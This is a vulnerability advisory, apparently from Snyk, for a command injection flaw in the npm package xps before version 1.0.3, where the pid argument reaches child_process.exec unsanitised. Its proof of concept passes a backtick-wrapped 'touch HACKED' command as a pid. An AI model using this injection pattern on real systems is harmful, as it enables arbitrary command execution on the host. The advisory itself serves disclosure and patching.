Command Injection Affecting xps package, versions <1.0.3


0.0
critical
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JS-XPS-590098

  • published

    24 Jul 2020

  • disclosed

    23 Jul 2020

  • credit

    d3lla

Introduced: 23 Jul 2020

CWE-78 Open this link in a new tab

How to fix?

Upgrade xps to version 1.0.3 or higher.

Overview

xps is a cross-platform library for listing and killing processes.

Affected versions of this package are vulnerable to Command Injection. The argument pid is used to build the command that is passed to the child_process.exec function without any sanitization.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
    
  2. install latest vulnerable xps module (v1.0.2): npm i xps@1.0.2

  3. create the following PoC JavaScript file (poc.js):

    const ps = require('xps');
    ps.kill('`touch HACKED;`').fork();
    
  4. make sure that the HACKED file does not exist: ls

  5. execute the poc.js file: node poc.js

  6. the HACKED file is created: ls